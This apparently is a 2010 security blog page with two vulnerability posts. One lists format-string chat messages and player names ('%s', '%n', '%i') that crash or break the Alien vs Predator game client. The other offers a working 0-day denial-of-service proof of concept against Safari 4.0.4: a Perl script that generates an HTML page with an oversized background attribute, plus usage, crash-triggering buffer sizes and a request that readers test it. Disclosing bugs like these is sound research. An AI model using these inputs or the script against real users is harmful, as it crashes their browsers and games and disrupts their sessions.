Alien vs Predator (Feb 17 patch) is vulnerable to Format String attacks.
Posting the following in Chat (either in game or in the lobby) will crash your game, I am not sure if it will crash other users, I haven't got anybody to test on.
%s%s%s%s%s%s%s%s%s%s
or
%n%n%n%n%n%n%n%n%n%n
Setting your Name to: '%n' will stop you from ever joining a game, you just get an error reporting your unable to connect.
Setting your Name to '%i' will set your Name to random numbers which changes as you play.
I tried contacting Steam/Rebellion/Sega, but so far had no response.
2010-02-27
2010-01-20
New 0Day Safari 'background' DoS
New 0Day Safari DoS I found last night.
Can somebody test to confirm its working for them?
Usage: perl Safari_4.0.4_background_DoS.pl output.htm 114516
Then browse to output.htm in Safari.
Can somebody test to confirm its working for them?
Usage: perl Safari_4.0.4_background_DoS.pl output.htm 114516
Then browse to output.htm in Safari.
#!/usr/bin/perl
#
# Safari 4.0.4 (531.21.10) - Stack Overflow/run
# 0Day DoS POC by John Cobb - www.NoBytes.com - 20/01/2010 - [v1.0]
# Tested on WinXP (32bit) SP3
#
# Magic Numbers:
# 114516 -> 114718 : Safari quits without error
# 114719 : Safari quits with illegal operation:
# AppName: safari.exe
# AppVer: 5.31.21.10
# ModName: cfnetwork.dll
# ModVer: 1.450.5.0
# Offset: 000567a7
$filename = $ARGV[0];
$buffer = $ARGV[1];
if(!defined($filename))
{
print "Usage: $0 <filename.html> <buffer>\n\n";
}
$header = "<html>
<head>" . "\n";
$crash = "<body background = \"" . "A" x $buffer . "\">" . "\n";
$footer = "</html>" . "\n";
$data = $header . $crash . $footer;
open(FILE, '>' . $filename);
print FILE $data;
close(FILE);
exit;
Subscribe to:
Posts (Atom)